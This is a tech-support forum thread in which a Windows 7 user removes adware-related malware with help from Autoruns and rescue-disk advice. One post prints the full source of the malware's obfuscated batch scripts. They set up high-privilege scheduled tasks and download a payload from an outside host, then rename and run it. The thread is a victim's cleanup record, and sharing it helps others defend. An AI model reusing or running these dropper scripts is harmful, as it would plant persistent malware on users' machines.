Windows 7 Forums
Welcome to Windows 7 Forums. Our forum is dedicated to helping you find support and solutions for any problems regarding your Windows 7 PC be it Dell, HP, Acer, Asus or a custom build. We also provide an extensive Windows 7 tutorial section that covers a wide range of tips and tricks.


Windows 7: Command Prompt Popping Randomly whenever I log on.

18 Jan 2018   #1
surya1999

Windows 7 Ultimate x64
 
 
Command Prompt Popping Randomly whenever I log on.

So recently, about a week ago, I had somehow installed a PUP on my system while trying to install another software. The installation was taking time so I went away and allowed it to continue and thats when I came and realised that I kept on getting redirected to mail.ru everytime I opened chrome.

Even after attempting to remove it from extensions and then trying to recover my google settings back to normal, chrome kept on crashing whenever I tried to make google my default search engine. So I looked up different solutions to the problem and somehow got mail.ru to stop redirecting me. At that point of time, Even when I wasnt browsing anything, Chrome would automatically open and show me some popup of an ad or mail.ru..

After I dealt with that, I clear my temp folder in C:\Windows and have since then downloaded and uninstalled and reinstalled chrome along with MalwareBytes and a bunch of other antivirus tools such as Chrome Software Toolkit, etc. Malware bytes showed me 144 threats to my system and I deleted all of them. I even went on to delete mail.ru folder from program files but I know its still there.

The reason for that is I keep getting these random cmd windows popping in and this is what it shows whenever I freshly log in to my computer:



When I disable my internet connected by removing the cable from the lan port, it shows this:



I tried visiting simstracking.info but nothing turned up there for me. Atleast, I couldnt view any of it.

The reason I mentioned the mail.ru story was because this window has been popping only since mail.ru infected my system. It popped up then too when the virus was still in the system and I let it complete downloading thinking it was software related. I am pretty certain its trying to redownload its packages and I dont let it. I have tried various antivirus removing methods, using MalwareBytes, Revo Uninstaller Pro, Exterminate It, Zemana Antimalware, but nothing seems to stop the cmd from poppng up.

When I open task manager and goto the file location, it just redirects me to the place where cmd.exe is located in windows folder system32 i believe...

I tried this solution as well:

Command Prompt Popping Up [Solved] - Command Prompt - Antivirus / Security / Privacy

and tried the solution given by Ralston18 and Ghoulio but an error message keeps on popping on powershell for me which is shown here:



Also, you can see only a skype service showed up for me whereas the original tenforums post has many more services shown. I have tried to tell you as much about this problem as I can and I am desperate for help now. Any additional help that is required of me, I am ready to do such as running scripts/commands, etc.


My System SpecsSystem Spec
.
19 Jan 2018   #2
mrjimphelps

Linux Mint 18.2 xfce 64-bit (VMWare host) / Windows 8.1 Pro 32-bit (VMWare guest)
 
 

Here's what you could do. The higher an option appears on the list below, the better it would be. For example, option 1 is the best, option 2 is the next best, and option 3 is the next best after option 2.

Option 1 - Unplug the computer and remove the hard drive. After a few minutes, install a new hard drive, and plug the computer back in. Do a clean install of Windows 7 on the new hard drive.

Option 2 - Boot with a Linux Live DVD, remove all partitions on the hard drive, create one new partition, then shut down and reboot with the Windows 7 install disk, and do a format and a Windows 7 install.

Option 3 - Reboot with a pre-Windows scanner DVD in the drive (e.g. Windows Defender Offline), booting to the DVD, then running a complete pre-Windows scan of your hard drive. Once that has finished, reboot without the DVD in the drive.

I think you have some kind of malware which has buried itself very deeply on your hard drive. The best way to deal with it may be to just replace the hard drive.
My System SpecsSystem Spec
21 Jan 2018   #3
surya1999

Windows 7 Ultimate x64
 
 

Thanks for the reply. But, unfortunately those options do not work for me there must be some other way of solving the issue... The virus probably has a boot-time script or something which it has planted before I removed the virus as a fail-safe to download itself back onto the machine... It does not pose a direct threat as long as I always be vigilant in closing the command prompt downloader after every login, but its very inconvenient for me and always the added danger of missing it. There must be some way to stop a specific boot time script or something or find where it is located. Also, how do I stop the Windows Powershell Access Denied Error from occuring?
My System SpecsSystem Spec
.

21 Jan 2018   #4
surya1999

Windows 7 Ultimate x64
 
 

Quote:
When I disable my internet connected by removing the cable from the lan port, it shows this:



I tried visiting simstracking.info but nothing turned up there for me. Atleast, I couldnt view any of it.
Sorry, thats the wrong image, accidently uploaded the same one.
Here's what happens when I close my internet connection:



Also, I seem to have gotten a new removable drive which has appeared on my computer. I didn't look into it before, but even after disconnecting all of my usb devices, I seem to get H: drive now on my computer:

My System SpecsSystem Spec
21 Jan 2018   #5
Barman58

Windows 10 Pro x64 x3, Ubuntu
 
 

Try to locate the call to cmd by using Autoruns from Microsoft what this utility does is list all the startup items set to run when you start your system and allows you to Disable, (to find out which is the cause of your issue), and eventually delete the startup command that is the issue.

There is a "Known Hijacks" tab which is where I would start but if nothing obvious here ( I would actually disable any entries here anyway, and then delete when all is seen to be well), carefully go though all the tabs and if you see a suspicious entry Disable and reboot, If the issue stops you know you have found the source and can go back and delete the entry in Autoruns, if not the re-enable the entry and try the next suspicious one...

Only do one entry at a time so as not to confuse the issues

This is not a majic bullet solution but although it may take some time it's a reliable method.

If you find and remove the issue and t-it comes back then the likely cause would be a scheduled task that can be searched for using the windows Built in Task Scheduler, again this can take time but is less costly than new hardware and should be capable of removing your issue

Also I would suggest that you could download a number of free anti malware packages to see if they can remove the problem for you ( always use a specific removal tool for any AV you try before using another option
My System SpecsSystem Spec
21 Jan 2018   #6
surya1999

Windows 7 Ultimate x64
 
 

Oh my god, thank you so much Barman58 for your solution. The virus thankfully did not bury itself so deep that it was impossible to get rid off. But Autoruns seems to have done it! I was successfully able to find out the processes which were causing the problem and I hope I have removed them all by reading the .bat files as best I could with my rudimentary knowledge. The .bat files had created scheduled tasks for the programs to run and that's what was causing the cmd to appear for downloading files.

For further reference and assistance to any others facing the issue, this is where the files were located (I deleted all of them and the issue seems to have stopped):
Code:
C:\Users\home\VoYdMiSyYoat(.bat/file)
C:\Users\home\AppData\Roaming\JBUaUyaSsE(.bat/file)
C:\Program Files (x86)\HWHi(.bat/file)
C:\Program Files (x86)\pETWiJsFWxCYw(.bat/file)
C:\Program Files (x86)\Common Files\uAAM.exe

Dont know whether this was related or but I deleted it anyways:
C:\Program Files (x86)\Common Files\isNUYFSvOwnmf.exe
I also cleared all the temp data at C:\Windows\Temp and C:\Users\home\AppData\Local\Temp (The latter is the one the virus used to store its data). In addition to that, I deleted the processes from scheduled tasks (the ones highlighted in red) by running Autoruns as provided by @Barman58 (kudos to you!):


To be sure that these were the files causing the problem, I checked their source code as well by taking a risk of running HWHi and indeed the same command prompt download came up which I closed well in time.

I am also adding the source code for the 4 bat files for confirmation if I correctly deleted everything and not missed anything to be double sure:

VoYdMiSyYoat:
Code:
start /min cmd /c "C:\Program Files (x86)\HWHi.bat"
exit
JBUaUyaSsE:
Code:
start /min cmd /c "C:\Program Files (x86)\pETWiJsFWxCYw.bat"
exit
HWHi:
Code:
@echo off
copy /y "C:\Program Files (x86)\pETWiJsFWxCYw" "C:\Pro%fOngiitYuYAs%gram F%lAfRPI%iles (x86)\pET%kOTCKaY%WiJsFWxCYw.bat"
copy /y "C%yeZAAchS%:\Users\home\AppData%ADexIGIgLuDIo%\%auUZ%Roami%YpeAgOiInEyRj%ng\jBUaUYaSsE" "C:%pfuCpUyu%\Use%hSylCa%rs\home\AppDa%irkAzuIZ%ta\Roamin%eeERU%g\j%EOaNEAfDaeHTC%BUaUY%owOOdyrXW%aSsE.bat"
schtasks /create /tn "rOxQmuwMEueX" /tr "'C:\Users\home\A%eUuUJ%ppData\Roaming\jBUaUYaSsE.bat' " /sc ONLOG%wZEaLEhAIy%ON /de%WHPAFm%lay 0003:00 /rl highest /f
set qTJnzyfjxUUL=%rANDOm%%RANDOm%
"C:%gIOEYiEA%\Program Files (x86)\C%sUoO%ommon Files%enpYYYfYyaho%\uAAM.exe" /tr%xAZr%AnsF%GAySxwe%ER eLaSuLIKUWP /DOwn%hATgIkQWYLcLv%LoAD /PrIo%fQoUvieDgiz%ritY hIgh http://simstracking%wScU%.info%qhyomY%/jrej%eMayRt%3%EbycjeAi%w50j9p4.%YeuaeyCeEA%zip "C:\Us%aUabiLW%ers\home\AppData\Local%aaIDIKmIYvu%\Temp\ylE%ZEoEpYyMybyYN%laoaIeerqF.zip"
rename "%UOYWqxVe%C:\Users\%WpxAYieUernZ%home\AppData\Loca%YgVY%l\Temp\y%GaWaAUVoHJfn%lEla%dpuaaJepU%oaIeerq%CEAI%F.zip%oAJfryunLyyc%" %qTJnzyfjxUUL%.exe%YyeeoXsyLVjuy%
cmd /c ""C:\Users\home\AppData\%IYeswKEEYi%Local\Temp\%qTJnzyfjxUUL%.exe" i"
pETWiJsFWxCYw:
Code:
@echo off
copy /y "C:\Program Files (x86)\HWHi" "C:%gIfyvcAZ%\Progra%IoAdjldxDuhA%m Files (x86)\HWHi.bat"
copy /y "C%twAOyiOHu%:\Users\home%OvYcadA%\VoYdMiSyYoaT" "C:%KzeuYo%\Users\home%QgIWoyYtyZyn%\VoYdMi%LLkYikeOiO%SyYoa%iHenlEkwvj%T.bat%VWoATVPjAgM%"
s%AehWLIq%chtasks /create /tn "i%yLyYvIOwIla%VaYnEhi%SeFIoBWeR%" /tr "'%edoyGoydqOOra%C:%MoIeRYZNAM%\Users\home\VoYdMiSyYoaT.bat' " /sc m%SSeS%inute /mo 180 /rl highe%iIbxiiyOGZw%s%GtPUHOhu%t /f%IHuiiovhA%
se%yeyikkIWWwIkI%t ZaTOixYJiH%ORYz%O%GLBQoAEm%=%rAnDom%%raNdom%
"C:\Program Files (x86)\%biFJPyI%Common Fi%AuuIVOLQMuyx%les\uAAM.exe" /TransfeR OINKyAQtPaVE /DOWNlOAD /p%OORuA%Ri%uUnerElQyOir%ORity h%MRLegov%iGH htt%ucUxoxNK%p://%UTAvhiVOc%simst%enPwOAeaiUxEx%racking.info/jrej3w50j9p4%YZkigph%.zip "C:\User%xUPiQ%s\hom%ueHaySn%e\AppData\Local\Temp\OuaaIPIUaej.z%SGcFgNChoi%ip"
ren%YoEHCwI%ame "C:\Users\home%IsFBEvsaOkB%\AppData\Local\%EMrCdi%Temp\OuaaI%UiyATeO%PIU%NUAA%aej.zip" %ZaTOixYJiHO%.ex%puUdRuoFEdP%e
cmd /%ySIiglto%c ""C:\User%oKUwqrAU%s\home\AppDat%uEON%a\Local\Temp\%ZaTOixYJiHO%.exe%IOOiiwucufIB%" i"
Reference Images:





Finally, I would gladly appreciate if someone could go over the code and check if I missed to delete something. Earlier, windows kept on crashing after 1 or 2 hours it was on with a blue crash dump screen. I will wait to see if the problem occurs again before marking this as solved. Thank you so much once again Barman58!!
My System SpecsSystem Spec
22 Jan 2018   #7
RickC998

Windows 7 Ultimate 32-bit
 
 

For a belt'n'braces approach, download the AVG Rescue CD and create either a USB from it (best, if your device will boot from USB) or CD (2nd best - slower in operation).

Boot from the AVG Rescue media and update the definitions. (It boots with includes network support so it can download the latest AV definitions from the internet).

Once updated, run a full scan. This may catch any remnants, particularly any rootkit-like malware that hides from the OS when booted normally.

The only downside of AVG Rescue is that it is very slow to scan, even when booted from USB.

Hope this helps...
My System SpecsSystem Spec
22 Jan 2018   #8
mrjimphelps

Linux Mint 18.2 xfce 64-bit (VMWare host) / Windows 8.1 Pro 32-bit (VMWare guest)
 
 

AVG Rescue CD is an excellent choice. It operates on the same principle as Windows Defender Offline (WDO); but I'm certain that it is better than WDO at dealing with malware. I wonder if it is a Linux antivirus scanner, or only a Windows antivirus scanner; in other words, does it look for Linux viruses, or just for Windows viruses?

There are some really cool tools on the AVG Rescue CD:
* Links Text Browser -- browse the web in text mode! Will be a lot faster, and you probably won't be at as much risk for picking up malware.
* Midnight commander -- sounds like a modern version of Norton Commander (remember that program?).

Another similar option would be to set up a Linux Live flash drive and install Sophos A/V for Linux. Sophos A/V for Linux scans for Linux, Windows, MAC, and Android malware:

https://www.sophos.com/en-us/product...for-linux.aspx
My System SpecsSystem Spec
22 Jan 2018   #9
RickC998

Windows 7 Ultimate 32-bit
 
 

Quote   Quote: Originally Posted by mrjimphelps
AVG Rescue CD is an excellent choice. It operates on the same principle as Windows Defender Offline (WDO); but I'm certain that it is better than WDO at dealing with malware. I wonder if it is a Linux antivirus scanner, or only a Windows antivirus scanner; in other words, does it look for Linux viruses, or just for Windows viruses?
It's just a Windows AV scanner, i.e. it scans known Windows locations, including the Windows registry.

Although AVG also has AV tools for Macs (Mountain Lion or newer), the AV Rescue system doesn't mention Macs so I assume it's Windows only.
My System SpecsSystem Spec
06 Feb 2018   #10
surya1999

Windows 7 Ultimate x64
 
 

Thank you all for your help, I tried out the above mentioned softwares and my system has been constantly running for about 1 week and no further problem has occured. I have since also downloaded Antivirus to protect against any future Viruses. I sincerely thank everyone for their help and advice.
My System SpecsSystem Spec
Reply

 Command Prompt Popping Randomly whenever I log on.




Thread Tools




Similar help and support threads
Thread Forum
Command Prompt command <ipconfig> not working
when I open up my command prompt and type 'ipconfig' without the ' and press enter it returns the line: 'ipconfig' is nto recognized as an internal or external command, operable program, or batch file I am trying to find out the information I need in order to set up a static IP Address for port...
Network & Sharing
Microsoft Windows Activation Technologies Prompt Keeps Popping Up
Greetings, I just started getting a repeat pop up asking for my permission to make changes to the computer - it's from Microsoft and the program is Windows Activation Technologies. I keep clicking on NO, but a few minutes later - it pops up again. All scans have been done for...
Windows Updates & Activation
Command Prompt: Repeat del command continuosly
Hi All, I'm running a program that parses .csv files and then changes them into ._OK files. This process takes longer when there are a large number of *.OK files in the folder where the files being converted are located. To remedy this I occasionally manually run this command: del *._OK ...
General Discussion
Run administrative command prompt from command prompt
Ok So I got myself into a unique bind here. I was trying to install some custom system files (for a theme) and I did it wrong and now I cant open explorer.exe . I dont want to goto a backup because this is a easy fix. (in my view). So I need to know how to run command prompt with administrative...
General Discussion
Popping Out Cmd Prompt
Im having this problem everytime i try to open one of my proggy in yahoo... can someone explain me why is this happening and whay should i do http://i53.tinypic.com/2nhj9di.png
General Discussion


Our Sites

Site Links

About Us

Find Us

Windows 7 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 7" and related materials are trademarks of Microsoft Corp.

Designer Media Ltd

All times are GMT -5. The time now is 20:51.
Twitter Facebook Google+ Seven Forums iOS App Seven Forums Android App